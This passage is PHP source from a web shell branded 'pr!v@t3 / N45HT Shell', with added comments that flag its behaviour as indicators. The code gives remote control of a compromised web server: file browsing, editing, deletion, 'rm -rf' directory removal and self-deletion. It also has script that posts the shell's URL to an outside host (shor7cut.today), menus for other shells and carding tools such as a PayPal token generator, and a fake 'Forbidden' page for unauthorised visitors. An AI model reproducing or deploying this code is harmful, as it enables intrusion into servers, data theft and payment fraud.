  3572. <textarea class="boxclose" style="margin: 0px; width: 527px; height: 172px;">
  3573. </textarea><br>
  3574. </center>';
  3575. }
  // `x=d` in the query string makes the script delete its own file via
  // shc::drop(); this parameter in access logs marks a clean-up request.
  3576. if($_GET['x']=="d"){
  3577. shc::drop();
  3578. }
  // The script emitted below posts the page's own URL (document.URL) to an
  // external host every time this action is rendered in a browser, so the
  // location of the installed shell is reported to a third party. The host
  // name in the string is a network indicator for proxy and DNS logs. The call
  // relies on `$` (jQuery) being loaded by the page, which is not visible in
  // this excerpt.
  3579. echo '
  3580. <script type="text/javascript">
  3581. $(document).ready(function(){
  3582. $.post("http://shor7cut.today/ip.php",
  3583. {patch: document.URL},
  3584. function(data,status){
  3585. });
  3586. });
  3587. </script>';
  3588. }elseif($_GET['do'] == 'tentang'){
  3589. echo "<center>";
  3590. echo '<pre>';
  3591. echo "<h2>pr!v@t3 Shell V1.1 / N45HT Shell v1.1</h2>";
  3592. echo "<p>Shell ini adalah hasil recode dari Shell Extreme Crew</p>";
  3593. echo "<p>Dalam v1.1, juga ditambahkan beberapa Fungsi Exploit. Silahkan di check sendiri</p>";
  3594. echo "<p>Terima kasih buat <strong>Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo</strong> yang telah dengan senang hati memperbolehkan menambah atau mengurangi isi coding nya";
  3595. echo "<p>Jika Anda mempunyai tools (Web Based Only) ingin di 'open sourcekan', bisa kirim melalui email : palsufake1@gmail.com</p>";
  3596. echo "<p>Let's Play With this Web Shell ^_^</p>";
  3597. echo "<p>Big Thanks For : </p>";
  3598. echo "<p>[! Extreme Crew - IndoXploit - K2LL33D - Mr.P-teo - N45HT - iTeens - Defacer Tersakiti Team - BackBox Team !]</p>";
  3599. } elseif($_GET['act'] == 'newfile') {
  3600. if($_POST['new_save_file']) {
  3601. $newfile = htmlspecialchars($_POST['newfile']);
  3602. $fopen = fopen($newfile, "a+");
  3603. if($fopen) {
  3604. $act = "<script>window.location='?bom&act=edit&folder=".$dir."&file=".$_POST['newfile']."';</script>";
  3605. } else {
  3606. $act = "<font color=red>permission denied</font>";
  3607. }
  3608. }
  3609. echo $act;
  3610. echo "<form method='post'>
  3611. Filename: <input type='text' name='newfile' value='$dir/newfile.php' style='width: 450px;' height='10'>
  3612. <input type='submit' name='new_save_file' value='Submit'>
  3613. </form>";
  3614. } elseif($_GET['act'] == 'newfolder') {
  3615. if($_POST['new_save_folder']) {
  3616. $new_folder = $dir.'/'.htmlspecialchars($_POST['newfolder']);
  3617. if(!mkdir($new_folder)) {
  3618. $act = "<font color=red>permission denied</font>";
  3619. } else {
  3620. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
  3621. }
  3622. }
  3623. echo $act;
  3624. echo "<form method='post'>
  3625. Folder Name: <input type='text' name='newfolder' style='width: 450px;' height='10'>
  3626. <input type='submit' name='new_save_folder' value='Submit'>
  3627. </form>";
  3628. } elseif($_GET['act'] == 'rename_dir') {
  3629. if($_POST['dir_rename']) {
  3630. $dir_rename = rename($dir, "".dirname($dir)."/".htmlspecialchars($_POST['fol_rename'])."");
  3631. if($dir_rename) {
  3632. $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
  3633. } else {
  3634. $act = "<font color=red>permission denied</font>";
  3635. }
  3636. echo "".$act."<br>";
  3637. }
  3638. echo "<form method='post'>
  3639. <input type='text' value='".basename($dir)."' name='fol_rename' style='width: 450px;' height='10'>
  3640. <input type='submit' name='dir_rename' value='rename'>
  3641. </form>";
  3642. } elseif($_GET['act'] == 'delete_dir') {
  3643. if(is_dir($dir)) {
  3644. if(is_writable($dir)) {
  3645. @rmdir($dir);
  3646. @exe("rm -rf $dir");
  3647. @exe("rmdir /s /q $dir");
  3648. $act = "<script>window.location='?bom&folder=".dirname($dir)."';</script>";
  3649. } else {
  3650. $act = "<font color=red>could not remove ".basename($dir)."</font>";
  3651. }
  3652. }
  3653. echo $act;
  3654. } elseif($_GET['act'] == 'view') {
  3655. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'><b>view</b></a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3656. echo "<textarea readonly>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea>";
  3657. } elseif($_GET['act'] == 'edit') {
  3658. if($_POST['save']) {
  3659. $save = file_put_contents($_GET['file'], $_POST['src']);
  3660. if($save) {
  3661. $act = "<font color=lime>Saved!</font>";
  3662. } else {
  3663. $act = "<font color=red>permission denied</font>";
  3664. }
  3665. echo "".$act."<br>";
  3666. }
  3667. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'><b>edit</b></a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'>rename</a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3668. echo "<form method='post'>
  3669. <textarea name='src'>".htmlspecialchars(@file_get_contents($_GET['file']))."</textarea><br>
  3670. <input type='submit' value='Save' name='save' style='width: 500px;'>
  3671. </form>";
  3672. } elseif($_GET['act'] == 'rename') {
  3673. if($_POST['do_rename']) {
  3674. $rename = rename($_GET['file'], "$dir/".htmlspecialchars($_POST['rename'])."");
  3675. if($rename) {
  3676. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
  3677. } else {
  3678. $act = "<font color=red>permission denied</font>";
  3679. }
  3680. echo "".$act."<br>";
  3681. }
  3682. echo "Filename: <font color=lime>".basename($_GET['file'])."</font> [ <a href='?bom&act=view&folder=$dir&file=".$_GET['file']."'>view</a> ] [ <a href='?bom&act=edit&folder=$dir&file=".$_GET['file']."'>edit</a> ] [ <a href='?bom&act=rename&folder=$dir&file=".$_GET['file']."'><b>rename</b></a> ] [ <a href='?bom&act=download&folder=$dir&file=".$_GET['file']."'>download</a> ] [ <a href='?bom&act=delete&folder=$dir&file=".$_GET['file']."'>delete</a> ]<br>";
  3683. echo "<form method='post'>
  3684. <input type='text' value='".basename($_GET['file'])."' name='rename' style='width: 450px;' height='10'>
  3685. <input type='submit' name='do_rename' value='rename'>
  3686. </form>";
  3687. } elseif($_GET['act'] == 'delete') {
  3688. $delete = unlink($_GET['file']);
  3689. if($delete) {
  3690. $act = "<script>window.location='?bom&folder=".$dir."';</script>";
  3691. } else {
  3692. $act = "<font color=red>permission denied</font>";
  3693. }
  3694. echo $act;
  3695. } else {
  3696. if(is_dir($dir) === true) {
  3697. if(!is_readable($dir)) {
  3698. echo "<font color=red>can't open directory. ( not readable )</font>";
  3699. } else {
  3700. echo '<table width="100%" class="table_home" border="0" cellpadding="3" cellspacing="1" align="center">
  3701. <tr>
  3702. <th class="th_home"><center>Name</center></th>
  3703. <th class="th_home"><center>Type</center></th>
  3704. <th class="th_home"><center>Size</center></th>
  3705. <th class="th_home"><center>Last Modified</center></th>
  3706. <th class="th_home"><center>Owner/Group</center></th>
  3707. <th class="th_home"><center>Permission</center></th>
  3708. <th class="th_home"><center>Action</center></th>
  3709. </tr>';
  3710. $scandir = scandir($dir);
  3711. foreach($scandir as $dirx) {
  3712. $dtype = filetype("$dir/$dirx");
  3713. $dtime = date("F d Y g:i:s", filemtime("$dir/$dirx"));
  3714. if(function_exists('posix_getpwuid')) {
  3715. $downer = @posix_getpwuid(fileowner("$dir/$dirx"));
  3716. $downer = $downer['name'];
  3717. } else {
  3718. //$downer = $uid;
  3719. $downer = fileowner("$dir/$dirx");
  3720. }
  3721. if(function_exists('posix_getgrgid')) {
  3722. $dgrp = @posix_getgrgid(filegroup("$dir/$dirx"));
  3723. $dgrp = $dgrp['name'];
  3724. } else {
  3725. $dgrp = filegroup("$dir/$dirx");
  3726. }
  3727. if(!is_dir("$dir/$dirx")) continue;
  3728. if($dirx === '..') {
  3729. $href = "<a href='?bom&folder=".dirname($dir)."'>$dirx</a>";
  3730. } elseif($dirx === '.') {
  3731. $href = "<a href='?bom&folder=$dir'>$dirx</a>";
  3732. } else {
  3733. $href = "<a href='?bom&folder=$dir/$dirx'>$dirx</a>";
  3734. }
  3735. if($dirx === '.' || $dirx === '..') {
  3736. $act_dir = "<a href='?bom&act=newfile&folder=$dir'>newfile</a> | <a href='?bom&act=newfolder&folder=$dir'>newfolder</a>";
  3737. } else {
  3738. $act_dir = "<a href='?bom&act=rename_dir&folder=$dir/$dirx'>rename</a> | <a href='?bom&act=delete_dir&folder=$dir/$dirx'>delete</a>";
  3739. }
  3740. echo "<tr>";
  3741. echo "<td class='td_home'><img src='data:image/png;base64,R0lGODlhEwAQALMAAAAAAP///5ycAM7OY///nP//zv/OnPf39////wAAAAAAAAAAAAAAAAAAAAAA"."AAAAACH5BAEAAAgALAAAAAATABAAAARREMlJq7046yp6BxsiHEVBEAKYCUPrDp7HlXRdEoMqCebp"."/4YchffzGQhH4YRYPB2DOlHPiKwqd1Pq8yrVVg3QYeH5RYK5rJfaFUUA3vB4fBIBADs='>$href</td>";
  3742. echo "<td class='td_home'><center>$dtype</center></td>";
  3743. echo "<td class='td_home'><center>-</center></th></td>";
  3744. echo "<td class='td_home'><center>$dtime</center></td>";
  3745. echo "<td class='td_home'><center>$downer/$dgrp</center></td>";
  3746. echo "<td class='td_home'><center>".w("$dir/$dirx",perms("$dir/$dirx"))."</center></td>";
  3747. echo "<td class='td_home' style='padding-left: 15px;'>$act_dir</td>";
  3748. echo "</tr>";
  3749. }
  3750. }
  3751. } else {
  3752. echo "<font color=red>can't open directory.</font>";
  3753. }
  3754. foreach($scandir as $file) {
  3755. $ftype = filetype("$dir/$file");
  3756. $ftime = date("F d Y g:i:s", filemtime("$dir/$file"));
  3757. $size = filesize("$dir/$file")/1024;
  3758. $size = round($size,3);
  3759. if(function_exists('posix_getpwuid')) {
  3760. $fowner = @posix_getpwuid(fileowner("$dir/$file"));
  3761. $fowner = $fowner['name'];
  3762. } else {
  3763. //$downer = $uid;
  3764. $fowner = fileowner("$dir/$file");
  3765. }
  3766. if(function_exists('posix_getgrgid')) {
  3767. $fgrp = @posix_getgrgid(filegroup("$dir/$file"));
  3768. $fgrp = $fgrp['name'];
  3769. } else {
  3770. $fgrp = filegroup("$dir/$file");
  3771. }
  3772. if($size > 1024) {
  3773. $size = round($size/1024,2). 'MB';
  3774. } else {
  3775. $size = $size. 'KB';
  3776. }
  3777. if(!is_file("$dir/$file")) continue;
  3778. echo "<tr>";
  3779. echo "<td class='td_home'><img src='data:image/png;base64,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'><a href='?bom&act=view&folder=$dir&file=$dir/$file'>$file</a></td>";
  3780. echo "<td class='td_home'><center>$ftype</center></td>";
  3781. echo "<td class='td_home'><center>$size</center></td>";
  3782. echo "<td class='td_home'><center>$ftime</center></td>";
  3783. echo "<td class='td_home'><center>$fowner/$fgrp</center></td>";
  3784. echo "<td class='td_home'><center>".w("$dir/$file",perms("$dir/$file"))."</center></td>";
  3785. echo "<td class='td_home' style='padding-left: 15px;'><a href='?bom&act=edit&folder=$dir&file=$dir/$file'>edit</a> | <a href='?bom&act=rename&folder=$dir&file=$dir/$file'>rename</a> | <a href='?bom&act=delete&folder=$dir&file=$dir/$file'>delete</a> | <a href='?bom&act=download&folder=$dir&file=$dir/$file'>download</a></td>";
  3786. echo "</tr>";
  3787. }
  3788. echo "</table>";
  3789. if(!is_readable($dir)) {
  3790. //
  3791. } else {
  3792. echo "<hr>";
  3793. }
  3794. echo "<center><form>
  3795. <select onchange='if (this.value) window.open(this.value);'>
  3796. <option selected='selected' value=''> Tools Creator </option>
  3797. <option value='$ling=wso'>WSO 2.8.1</option>
  3798. <option value='$ling=injection'>1n73ction v3</option>
  3799. <option value='$ling=wk'>WHMCS Killer</option>
  3800. <option value='$ling=adminer'>Adminer</option>
  3801. <option value='$ling=b374k'>b374k Shell</option>
  3802. <option value='$ling=b374k323'>b374k 3.2</option>
  3803. <option value='$ling=bh'>BlackHat Shell</option>
  3804. <option value='$ling=dhanus'>Dhanush Shell</option>
  3805. <option value='$ling=r57'>R57 Shell</option>
  3806. <option value='$ling=encodedecode'>Encode Decode</option>
  3807. <option value='$ling=r57'>R57 Shell</option>
  3808. </select>
  3809. <select onchange='if (this.value) window.open(this.value);'>
  3810. <option selected='selected' value=''> Tools Carder </option>
  3811. <option value='$ling=extractor'>DB Email Extractor</option>
  3812. <option value='$ling=promailerv2'>Pro Mailer V2</option>
  3813. <option value='$ling=bukalapak'>BukaLapak Checker</option>
  3814. <option value='$ling=tokopedia'>TokoPedia Checker</option>
  3815. <option value='$ling=tokenpp'>Paypal Token Generator</option>
  3816. <option value='$ling=mailer'>Mailer</option>
  3817. <option value='$ling=gamestopceker'>GamesTop Checker</option>
  3818. </select>
  3819. <noscript><input type='submit' value='Submit'></noscript>
  3820. </form>";
  3821. echo "<center>Copyright &copy; ".date("Y")." - <a href='?bom&folder=$dir&do=tentang'>pr!v@t3</a></center>";
  3822. }
  3823. echo "</html>";
  3824. }
  3825. else
  3826. {
  3827. echo "<h1>Forbidden</h1><p>You dont't have permission to access ".$dir." on this server.</p><hr>
  3828. <address>Apache Server at ".gethostbyname($_SERVER['HTTP_HOST'])." Port 80</address></body></html>";
  3829. return false;
  3830. }
  3831. ?>